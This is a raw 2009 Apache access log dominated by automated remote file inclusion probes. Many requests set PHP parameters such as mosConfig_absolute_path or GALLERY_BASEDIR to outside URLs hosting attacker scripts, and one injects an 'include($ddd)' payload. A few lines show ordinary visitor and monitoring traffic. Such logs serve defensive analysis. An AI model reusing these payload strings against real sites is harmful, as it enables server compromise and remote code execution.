200.35.150.139 - - [18/Oct/2009:04:44:49 -0400] "GET /logs/access_log.Q109081400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:46:23 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:46:27 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:46:28 -0400] "GET /logs/access_log.Q109081000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:46:29 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
189.84.117.106 - - [18/Oct/2009:04:47:09 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
206.225.23.4 - - [18/Oct/2009:04:47:38 -0400] "GET /logs/access_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:38 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:38 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:42 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:42 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:42 -0400] "GET /logs/access_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:43 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:43 -0400] "GET /logs/access_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:43 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:46 -0400] "GET /logs/error_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:47:48 -0400] "GET /logs/access_log.Q109082000%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:47:50 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:47:50 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:47:50 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:51 -0400] "GET /logs/error_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:47:52 -0400] "GET /logs/error_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:47:53 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:47:53 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:47:53 -0400] "GET /logs/access_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:47:56 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:47:57 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:47:57 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:48:00 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:48:00 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:48:00 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:02 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:03 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:03 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:48:04 -0400] "GET /logs/access_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:48:04 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.16 - - [18/Oct/2009:04:48:04 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://vandanashourie.com/logicampus-2.0.3/id.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:48:07 -0400] "GET /logs/access_log.Q109081400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.66.112.34 - - [18/Oct/2009:04:48:08 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
211.48.121.149 - - [18/Oct/2009:04:48:10 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs/access_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs/access_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:18 -0400] "GET /logs/access_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:25 -0400] "GET /logs/error_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:27 -0400] "GET /logs/error_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:48:27 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:48:27 -0400] "GET /logs/error_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:42 -0400] "GET /logs/access_log.Q109092700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:42 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
151.8.79.19 - - [18/Oct/2009:04:48:45 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:48:49 -0400] "GET /logs/access_log.Q109100200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:04:49:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.48.121.149 - - [18/Oct/2009:04:49:18 -0400] "GET /logs/access_log.Q109081400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:50:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:50:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:51:11 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:04:51:19 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:51:20 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:51:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:51:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:51:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.133.148.98 - - [18/Oct/2009:04:51:22 -0400] "GET /logs/access_log.Q109073100///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:04:51:22 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:04:51:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [18/Oct/2009:04:51:44 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [18/Oct/2009:04:51:44 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.143.3.188 - - [18/Oct/2009:04:51:44 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
122.153.32.10 - - [18/Oct/2009:04:52:20 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:52:20 -0400] "GET /logs/access_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:52:20 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:52:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:52:28 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:52:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:52:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
200.35.150.139 - - [18/Oct/2009:04:52:32 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:52:32 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:52:32 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
218.234.21.178 - - [18/Oct/2009:04:52:32 -0400] "GET /logs/access_log.Q109072000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.234.21.178 - - [18/Oct/2009:04:52:32 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
